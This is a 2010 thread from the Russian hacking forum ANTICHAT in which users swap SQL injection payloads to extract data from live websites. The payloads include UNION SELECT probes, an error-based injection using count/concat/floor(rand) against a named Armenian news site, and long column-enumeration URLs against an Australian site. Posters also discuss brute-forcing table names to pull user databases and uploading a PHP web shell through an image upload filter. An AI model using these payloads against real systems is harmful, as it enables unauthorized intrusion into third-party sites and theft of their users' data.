ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.06.2010, 23:16
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Если ошибка выводится,крути как слепую с выводом в ошибку.
|
|
|
24.06.2010, 00:06
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от durito
durito said:
вопрос такой:
есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id
index.php?id=-37+union+select+1,2/*
index.php?id=3111117+union+select+1,2/*
index.php?id=37+and+1=2+union+select+1,2/*
скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?
попробуй типа этого...
index.php?id=-37)/**/and/**/1=2/**/uNion+all+seLect+null,null+from+information_schema .tables+limit+0,1/*
есле 5тая версия.. а не какайта там 3-тья иле четвертая..
и вообще тут уже многие говорили по 100 раз, никто не любит гадать, любо линк в студию либо надейся сам на удачу, и вообще версию хотя б сказал.
-> +AND+substring(version,1,1)=5
|
|
|
|
24.06.2010, 02:25
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
[Feldmarschall], нет, я понимаю конечно лето, мозги совсем плавятся, но как твой пример запроса поможет в вопросе дурито ? И кэп подсказывает что и так про блинд метод знает, но хочет добиться вывода.
durito, в голову приходит мысль попробовать помутить ченить с условиями типа такого
index.php?id=37+and+if(5=4,NULL,NUll)+union+select +1,2/*
но мне почему то кажется что все равно ничего не получится, и оно равносильно этому запросу
index.php?id=37+and+1=2+union+select+1,2/*
|
|
|
|
24.06.2010, 03:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
[QUOTE="Konqi"]
Konqi said:
ребят не могу залить шелл, в админке есть место для загрузки картинок,но стоит хороший фильтр и на стороне сервера и на JS..
при загрузке php файла вылетает aкошка JS и говорит что нельзя этот формат и тп, но файл все же загружается, но когда иду по линку файла то виден только один символ и пустая страница
то есть если контент файла
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
то на странице видна только символ '[/COLOR][/COLOR]
[/PHP]
то на странице видна только символ ' |
|
|
|
24.06.2010, 06:34
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от durito
durito said:
вопрос такой:
есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id
index.php?id=-37+union+select+1,2/*
index.php?id=3111117+union+select+1,2/*
index.php?id=37+and+1=2+union+select+1,2/*
скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?
Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:
index.php?id=37+limit+0+union+select+1,2/*
Ну или так:
index.php?id=37+union+select+1,2+limit+1,1/*
|
|
|
|
24.06.2010, 09:41
|
|
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме:
5094
Репутация:
0
|
|
Сообщение от None
http://www.nortun.am/pages.php?al=news&pid=1&id=568%27&act=more
вот поjaлсута помоqите раскрутить..
как то не получается
|
|
|
|
24.06.2010, 11:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от k2b1~
k2b1~ said:
вот поjaлсута помоqите раскрутить..
как то не получается
Код:
Code:
http://www.nortun.am/pages.php?al=news&pid=1&id=568'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+sed_zpages+group+by+2+limit+1)a)--+&act=more
|
|
|
|
24.06.2010, 11:52
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
Сообщение от DrAssault
DrAssault said:
Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:
index.php?id=37+limit+0+union+select+1,2/*
Ну или так:
index.php?id=37+union+select+1,2+limit+1,1/*
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*
в первом случае The profile is not active!
во-втором тоже самое
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80+limit+0,1/*
проходит, но толку
|
|
|
|
24.06.2010, 12:05
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от durito
durito said:
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*
в первом случае The profile is not active!
во-втором тоже самое
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80+limit+0,1/*
проходит, но толку
версия базы 4.0.21-log так что все равно брутом надо табелки подбирать
|
|
|
|
24.06.2010, 12:21
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
Gorev брутом тянуть базу юзеров это анреал
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2221722){kind=avatar}
Похожие темы
Линейный вид
